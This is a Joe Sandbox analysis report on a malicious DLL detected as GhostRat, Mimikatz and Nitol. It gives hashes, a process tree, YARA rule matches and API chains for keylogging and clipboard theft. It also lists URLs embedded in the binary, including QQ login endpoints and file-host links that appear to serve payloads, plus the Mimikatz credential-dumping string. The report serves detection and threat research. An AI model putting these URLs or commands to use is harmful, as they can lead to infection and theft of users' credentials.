Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZfJheGhddq.dll

Overview

General Information

Sample name:ZfJheGhddq.dll
renamed because original name is a hash value
Original sample name:57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc.dll
Analysis ID:1557655
MD5:18ea526e9d1f36692776b2004cecd595
SHA1:7d37805f3d1ffe9f43c599ae50dce96abf0a63c5
SHA256:57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc
Tags:103-45-64-91dlluser-JAMESWT_MHT
Infos:

Detection

GhostRat, Mimikatz, Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GhostRat
Yara detected Mimikatz
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to automate explorer (e.g. start an application)
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Contains functionality to modify windows services which are used for security filtering and protection
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 1568 cmdline: loaddll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2688 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6908 cmdline: rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 3644 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6524 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 4268 cmdline: rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 7048 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4808 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MimiKatzVaronis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
  • APT32
  • Anunak
  • GALLIUM
https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
No configs have been found
SourceRuleDescriptionAuthorStrings
ZfJheGhddq.dllJoeSecurity_GhostRatYara detected GhostRatJoe Security
    ZfJheGhddq.dllJoeSecurity_NitolYara detected NitolJoe Security
      ZfJheGhddq.dllJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
        ZfJheGhddq.dllMimikatz_StringsDetects Mimikatz stringsFlorian Roth
        • 0x11fcaf:$x1: sekurlsa::logonpasswords
        ZfJheGhddq.dllINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
        • 0x10444a:$h1: Hid_State
        • 0x1169b0:$h1: Hid_State
        • 0x10445e:$h2: Hid_StealthMode
        • 0x1169d0:$h2: Hid_StealthMode
        • 0x10447e:$h3: Hid_HideFsDirs
        • 0x1169f0:$h3: Hid_HideFsDirs
        • 0x10449c:$h4: Hid_HideFsFiles
        • 0x116a10:$h4: Hid_HideFsFiles
        • 0x1044bc:$h5: Hid_HideRegKeys
        • 0x116a30:$h5: Hid_HideRegKeys
        • 0x1044dc:$h6: Hid_HideRegValues
        • 0x116a50:$h6: Hid_HideRegValues
        • 0x104500:$h7: Hid_IgnoredImages
        • 0x116a80:$h7: Hid_IgnoredImages
        • 0x104524:$h8: Hid_ProtectedImages
        • 0x116ab0:$h8: Hid_ProtectedImages
        • 0x108d66:$s1: FLTMGR.SYS
        • 0x11c6da:$s1: FLTMGR.SYS
        • 0x1092e2:$s2: HAL.dll
        • 0x105e86:$s3: \SystemRoot\System32\csrss.exe
        • 0x118630:$s3: \SystemRoot\System32\csrss.exe
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
          00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
            00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
              Process Memory Space: loaddll32.exe PID: 1568JoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
                Process Memory Space: rundll32.exe PID: 4268JoeSecurity_Mimikatz_1Yara detected MimikatzJoe Security
                  Click to see the 1 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.loaddll32.exe.100fbd38.2.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0x7b12:$h1: Hid_State
                  • 0x7b26:$h2: Hid_StealthMode
                  • 0x7b46:$h3: Hid_HideFsDirs
                  • 0x7b64:$h4: Hid_HideFsFiles
                  • 0x7b84:$h5: Hid_HideRegKeys
                  • 0x7ba4:$h6: Hid_HideRegValues
                  • 0x7bc8:$h7: Hid_IgnoredImages
                  • 0x7bec:$h8: Hid_ProtectedImages
                  • 0xc42e:$s1: FLTMGR.SYS
                  • 0xc9aa:$s2: HAL.dll
                  • 0x954e:$s3: \SystemRoot\System32\csrss.exe
                  • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  • 0x258:$s5: INIT
                  • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
                  3.2.rundll32.exe.1010b380.1.raw.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xb630:$h1: Hid_State
                  • 0xb650:$h2: Hid_StealthMode
                  • 0xb670:$h3: Hid_HideFsDirs
                  • 0xb690:$h4: Hid_HideFsFiles
                  • 0xb6b0:$h5: Hid_HideRegKeys
                  • 0xb6d0:$h6: Hid_HideRegValues
                  • 0xb700:$h7: Hid_IgnoredImages
                  • 0xb730:$h8: Hid_ProtectedImages
                  • 0x1135a:$s1: FLTMGR.SYS
                  • 0xd2b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  4.2.rundll32.exe.1010b380.2.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xaa30:$h1: Hid_State
                  • 0xaa50:$h2: Hid_StealthMode
                  • 0xaa70:$h3: Hid_HideFsDirs
                  • 0xaa90:$h4: Hid_HideFsFiles
                  • 0xaab0:$h5: Hid_HideRegKeys
                  • 0xaad0:$h6: Hid_HideRegValues
                  • 0xab00:$h7: Hid_IgnoredImages
                  • 0xab30:$h8: Hid_ProtectedImages
                  • 0xfb5a:$s1: FLTMGR.SYS
                  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  3.2.rundll32.exe.1010b380.1.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0xaa30:$h1: Hid_State
                  • 0xaa50:$h2: Hid_StealthMode
                  • 0xaa70:$h3: Hid_HideFsDirs
                  • 0xaa90:$h4: Hid_HideFsFiles
                  • 0xaab0:$h5: Hid_HideRegKeys
                  • 0xaad0:$h6: Hid_HideRegValues
                  • 0xab00:$h7: Hid_IgnoredImages
                  • 0xab30:$h8: Hid_ProtectedImages
                  • 0xfb5a:$s1: FLTMGR.SYS
                  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
                  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  3.2.rundll32.exe.100fbd38.2.unpackINDICATOR_TOOL_RTK_HiddenRootKitDetects the Hidden public rootkitditekSHen
                  • 0x7b12:$h1: Hid_State
                  • 0x7b26:$h2: Hid_StealthMode
                  • 0x7b46:$h3: Hid_HideFsDirs
                  • 0x7b64:$h4: Hid_HideFsFiles
                  • 0x7b84:$h5: Hid_HideRegKeys
                  • 0x7ba4:$h6: Hid_HideRegValues
                  • 0x7bc8:$h7: Hid_IgnoredImages
                  • 0x7bec:$h8: Hid_ProtectedImages
                  • 0xc42e:$s1: FLTMGR.SYS
                  • 0xc9aa:$s2: HAL.dll
                  • 0x954e:$s3: \SystemRoot\System32\csrss.exe
                  • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
                  • 0x258:$s5: INIT
                  • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
                  Click to see the 25 entries

                  System Summary

                  barindex
                  Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3644, TargetFilename: C:\Users\Public\Documents\MM
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: ZfJheGhddq.dllAvira: detected
                  Source: ZfJheGhddq.dllReversingLabs: Detection: 65%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.2% probability
                  Source: ZfJheGhddq.dllJoe Sandbox ML: detected
                  Source: ZfJheGhddq.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
                  Source: Binary string: rundll32.pdb source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
                  Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
                  Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,0_2_100254C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,3_2_100254C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,0_2_10009080
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_100092A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,0_2_100097D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,0_2_1002AB10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009B60 FindFirstFileA,FindClose,FindClose,0_2_10009B60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,0_2_10009C40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,0_2_1000BD50
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,3_2_10009080
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100092A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,3_2_100097D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,3_2_1002AB10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009B60 FindFirstFileA,FindClose,FindClose,3_2_10009B60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,3_2_10009C40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,3_2_1000BD50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,0_2_10008E50
                  Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_1002E040
                  Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then test byte ptr [101218B4h], 00000008h0_2_1003E318
                  Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then movdqa dqword ptr [edi], xmm70_2_1003E490
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_1002E040
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then test byte ptr [101218B4h], 00000008h3_2_1003E318
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then movdqa dqword ptr [edi], xmm73_2_1003E490
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10014060 InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,#823,HttpQueryInfoA,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strstr,strstr,#825,strstr,strncpy,strstr,#825,strstr,strncat,strstr,#825,InternetOpenA,InternetConnectA,InternetCloseHandle,sprintf,sprintf,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,sprintf,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,atol,#823,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,MultiByteToWideChar,#823,MultiByteToWideChar,#825,WideCharToMultiByte,#823,WideCharToMultiByte,#825,strstr,#825,#825,0_2_10014060
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: http://ptlogin2.qun.qq.com%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: http://ptlogin2.qun.qq.com%sAccept-Language:
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: http://qun.qq.com%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: http://qun.qq.com%sAccept-Language:
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
                  Source: loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: https://localhost.ptlogin2.qq.com:4301%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: https://localhost.ptlogin2.qq.com:4301%sAccept-Language:
                  Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: https://ssl.ptlogin2.qq.com%s
                  Source: loaddll32.exe, rundll32.exeString found in binary or memory: https://ssl.ptlogin2.qq.com%sAccept-Language:
                  Source: rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllString found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: <BackSpace>0_2_1000B840
                  Source: C:\Windows\System32\loaddll32.exeCode function: <Enter>0_2_1000B840
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: <BackSpace>3_2_1000B840
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: <Enter>3_2_1000B840
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,0_2_100025B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,0_2_100026B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,0_2_10002770
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_100029D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,0_2_10017BB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,3_2_100026B0
